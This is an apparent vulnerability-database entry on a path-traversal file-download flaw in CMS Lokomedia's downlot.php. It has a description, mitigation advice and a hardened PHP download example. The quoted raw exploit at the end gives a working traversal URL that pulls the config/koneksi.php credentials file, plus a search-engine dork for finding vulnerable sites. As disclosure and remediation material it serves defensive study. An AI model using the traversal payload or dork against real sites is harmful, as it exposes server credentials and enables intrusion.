Vendor: CMS Lokomedia
By: Xr0b0t
CVSS: 7.5 (HIGH)
Type: LFD
CWE: 22
Product Name: CMS Lokomedia
Affected Version From: all versions
Affected Version To: all versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

CMS Lokomedia Local File Download Vulnerability

CMS Lokomedia contains a Local File Download (LFD) vulnerability: the 'downlot.php' script does not sufficiently sanitize the user-supplied 'file' parameter. An attacker who sends an HTTP request to the vulnerable script with a specially crafted 'file' parameter can download any file from the server.

Mitigation:

Validate and sanitize the user-supplied 'file' parameter before it is used. Additionally, restrict access to the vulnerable script.
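
One way to apply the input-validation advice to a download script, shown as an added example and not CMS Lokomedia's own code. The `DOWNLOAD_DIR` location and the `resolve_download()` helper are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumed directory holding the files meant for download (not from the CMS).
const DOWNLOAD_DIR = __DIR__ . '/files';

// Hypothetical helper: map the 'file' value to a real path inside $baseDir,
// or return null when the request must be refused.
function resolve_download($requested, string $baseDir): ?string
{
    // Refuse arrays (file[]=x), empty values and NUL bytes.
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Refuse anything with a directory component, e.g. ../config/koneksi.php.
    if ($requested !== basename($requested)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null; // base directory missing or file does not exist
    }
    // The canonical path must still sit under the base directory; this also
    // rejects "." and ".." and symlinks that point outside it.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

$file = resolve_download($_GET['file'] ?? null, DOWNLOAD_DIR);
if ($file === null) {
    http_response_code(404);
    exit;
}

// Serve as an opaque attachment so the browser never renders the content.
$name = str_replace(['"', "\r", "\n"], '', basename($file));
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . $name . '"');
header('Content-Length: ' . (string) filesize($file));
header('X-Content-Type-Options: nosniff');
readfile($file);
```

Keeping the download directory free of configuration and source files means that even a validation mistake exposes nothing sensitive.
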
Source

Exploit-DB raw data:

[!]===========================================================================[!]

[~] CMS Lokomedia Local File Download Vulnerability
[~] Author : Xr0b0t (xrt.interpol@gmx.us)
[~] Homepage : http://www.indonesiancoder.com | http://xrobot.mobi | http://mc-crew.net
[~] Date : 16 May, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://bukulokomedia.com/home
[+] Price : free
[+] Vulnerability : LFD
[+] Dork : inurl:"*.php?file=" ;)
[+] Version : all versions

[!]===========================================================================[!]

[ Vulnerable File ]
    http://127.0.0.1/path/downlot.php?file=[LFD]



[ XpL ]

    http://127.0.0.1/path/downlot.php?file=../config/koneksi.php

etc etc etc ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] Don Tukulesto, silly, why haven't you come over here...
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212


[ NOTE ]

[+] Don't go punching each other, OK ..
[+] Everyone step aside, Arumbia Team is coming through ;)
[+] MBEM : lup u :">

[ QUOTE ]

[+] INDONESIANCODER still r0x...
[+] Arumbia Team was here, dude, everyone step aside, we're coming through ..
[+] Malang Cyber Crew & Magelang Cyber Community